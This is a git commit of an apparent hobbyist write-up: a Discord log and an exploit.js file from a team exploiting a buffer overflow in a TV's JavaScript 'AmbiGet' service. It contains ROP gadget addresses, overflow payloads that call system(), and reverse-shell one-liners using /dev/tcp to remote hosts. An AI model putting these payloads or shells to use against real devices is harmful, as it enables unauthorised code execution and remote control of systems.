Yes... I forgot to commit during writeups etc.

files/28_apr_2020/README.md

@@ -0,0 +1 @@
+# 28 April 2020

files/28_apr_2020/discord.md

@@ -0,0 +1,303 @@
+# Discord messages of interest
+Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.
+
+> ok so I found some stuff :^)  
+> ```// write primitive 4bytes
+> // looks relatively safe to call (crashes with a 1 deref in strstr)
+> PC = 0x23BCC
+> R4 = address+0x880
+> R11 = data
+> 
+> // system call (SP buffer)
+> PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
+> R4 = R11 = unused
+> 
+> // system call (R4 buffer)
+> // looks super safe
+> PC = 0x11D48 or 0x14108
+> R4 = address of ascii string for system()
+> R11 = unused
+> 
+> // system call (R4 buffer) but probably unsafe
+> PC = 0x2F3DC (super unsafe) or 0x2F52C
+> R4 = address of ascii string for system()
+> R11 = unused
+> ```  
+> these are the useful gadgets  
+> there seems to be a memory area that stays static between runs, and is in a good address range  
+> thus it might be possible to use the write primitive to write a buffer for system there  
+> @Jan4V#0289 
+
+> You will still have to catch me up with what I should do though xd  
+> @Emily | Sunpy#5213 
+
+> can you send me the js you have for the AmbiGet?  
+> I wanna make a nicer setup for this and we can try  
+> @Jan4V#0289 
+
+> ```js
+> new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+>     "     >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+> )
+> ```  
+> @Emily | Sunpy#5213 
+
+> File: `exploit.js` (1.72 KB)  
+> this is the general idea  
+> but I wouldn't run this whole thing at first  
+> if/when you wanna mess with this mention me and I'll jump into voice  
+> @Jan4V#0289 
+
+> ``/dev/shm/shm_tmp/fusion.0.1``  
+> @Jan4V#0289 
+
+> File: `crashdump` (6.03 MB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdump` (181.60 KB)  
+> @Emily | Sunpy#5213 
+
+> ```js
+> function executeShellcode(shellcode) {
+>     var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 4194304; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += shellcode;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> ```  
+> @Jan4V#0289 
+
+> http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/  
+> @Emily | Sunpy#5213 
+
+> http://shell-storm.org/shellcode/files/shellcode-730.php  
+> @Jan4V#0289 
+
+> btw `"a".repeat(123)` is a thing  
+> @HoLLy#2750 
+
+> ```js
+> function executeShellcode(shellcode) {
+>     var payload = "A".repeat(1036);
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 0x400000; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += shellcode;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> executeShellcode(encodeInt(0xEF91337B));
+> ```  
+> @Jan4V#0289 
+
+> File: `crashdump` (124.31 KB)  
+> @Emily | Sunpy#5213 
+
+> 
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> function executeCommand(command) {
+>     var payload = "A"*1036;
+>     payload += encodeInt(0x01011D48);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 0x400000; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += encodeInt(0xE2444401);
+>     payload += encodeInt(0xE1A0B004);
+>     payload += encodeInt(0xE28F4008);
+>     payload += encodeInt(0xE1A0F00B);
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += command;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> executeCommand("touch /tmp/jan4v.txt");
+> ```  
+> @Jan4V#0289 
+
+> File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp)  
+> @Emily | Sunpy#5213 
+
+> ``/dev/shm/shm_tmp/fusion.0.1``  
+> @Jan4V#0289 
+
+> File: `crashdump` (6.03 MB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdump` (167.34 KB)  
+> @Emily | Sunpy#5213 
+
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> 
+> function execute(pc, r4, r11) {
+>     var payload = "A".repeat(1040);
+>     payload += encodeInt(r4);
+>     payload += encodeInt(r11);
+>     payload += encodeInt(pc);
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> function writeMemory4(address, data)
+> {
+>     execute(0x23BCC, address + 0x880, data);
+> }
+> 
+> function callSystem(address)
+> {
+>     execute(0x11D48, address, 0x41414141);    
+> }
+> 
+> writeMemory4(0x8a55f040, 0x7478742E);
+> ```  
+> @Jan4V#0289 
+
+> I mean you could already pwn the browser  
+> I believe  
+> so you could make it display any web page  
+> and we can read/write a bunch of files on the fs  
+> but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)  
+> @HoLLy#2750 
+
+> We couldn't overwrite the scripts though  
+> @Shaddy#4422 
+
+> when I say "we" I basically mean an  
+> we tried like 1 script lol  
+> @HoLLy#2750 
+
+> we dont have permissions to write to the file  
+> we only have permissions to tmp  
+> @Emily | Sunpy#5213 
+
+> there's multiple places that get executed  
+> probably more places too though  
+> @HoLLy#2750 
+
+> We've tried multiple places  
+> @Shaddy#4422 
+
+> if there's a file/folder with incorrect permissions  
+> @HoLLy#2750 
+
+> That's the less exciting exploit anyway :^)  
+> @Shaddy#4422 
+
+> I tried to look for a script that *may* be in tmp that gets executed as the people doesnt seem to be consistent  
+> but couldnt find any  
+> we have permissions to /3rd_rw aswell  
+> @Emily | Sunpy#5213 
+
+> im going to jump out the window  
+> we can write commands to an ini file in read/write area  
+> @Emily | Sunpy#5213 
+
+> ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``  
+> @Jan4V#0289 
+
+> @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &`  
+> @HoLLy#2750 
+
+> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/  
+> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet  
+> @HoLLy#2750 
+
+> `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &`  
+> @Emily | Sunpy#5213 
+
+> ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &``  
+> @Jan4V#0289 
+
+> File: `crashdump` (268.85 KB)  
+> @Emily | Sunpy#5213 
+
+> ![Terminal-tmux](img/img0.png "img0")  
+> @HoLLy#2750 
+
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> 
+> function execute(pc, r4, r11) {
+>     var payload = "A".repeat(1040);
+>     payload += encodeInt(r4);
+>     payload += encodeInt(r11);
+>     payload += encodeInt(pc);
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> function callSystem(address)
+> {
+>     execute(0x11D48, address, 0x41414141);    
+> }
+> 
+> callSystem(0x9CF55588);
+> ```  
+> @Jan4V#0289 
+
+> ![cmd - nc -nlvp 1337](img/img1.png "img1")  
+> @Emily | Sunpy#5213 
+
+> ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l``  
+> ![openbox commands](img/img2.png "img2")  
+> @Jan4V#0289 
+
+> ``mount -t devpts none /dev/pts``  
+> @Jan4V#0289 
+
+> ![terminal](img/img3.png "img3")  
+> @Emily | Sunpy#5213 
+
+> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz  
+> @Jan4V#0289 
+
+> https://betacraft.pl/server-archive/minecraft/  
+> @Jan4V#0289 
+
+> https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz  
+> @Jan4V#0289 
+
+> ``LD_LIBRARY_PATH=/lib:/3rd_rw/server``  
+> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz  
+> @Jan4V#0289 
+
+> ![minecraft server start](img/img4.png "img4")  
+> ![minecraft server still starting](img/img5.png "img5")  
+> @Emily | Sunpy#5213 
+
+> 569043771063ns loadtime :D  
+> @Emily | Sunpy#5213 
+
+> ![minecraft server running](img/img6.png "img6")  
+> @Emily | Sunpy#5213 
+
+> ```
+> AllowTcpForwarding remote  
+> AllowStreamLocalForwarding no  
+> GatewayPorts yes  
+> ```  
+> @Jan4V#0289 
+
+> > minecraft code execution  
+> > \- Holly  
+> @Emily | Sunpy#5213 
+

files/28_apr_2020/files/exploit.js

@@ -0,0 +1,30 @@
+function encodeInt(input) {
+	return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+}
+
+function execute(pc, r4, r11) {
+	var payload = "A".repeat(1040);
+	payload += encodeInt(r4);
+	payload += encodeInt(r11);
+	payload += encodeInt(pc);
+	new TV_JSP().tvServices.AmbiGet(0, payload);
+}
+
+function writeMemory4(address, data)
+{
+	execute(0x23BCC, address + 0x880, data);
+}
+
+function callSystem(address)
+{
+	execute(0x11D48, address, 0x41414141);	
+}
+
+writeMemory4(0x40383FFB, 0x7478742E);
+writeMemory4(0x40383FF7, 0x76346E61);
+writeMemory4(0x40383FF3, 0x6A2F706D);
+writeMemory4(0x40383FEF, 0x742F2068);
+writeMemory4(0x40383FEB, 0x63756F74);
+callSystem(0x40383FEB);
+
+// Does not work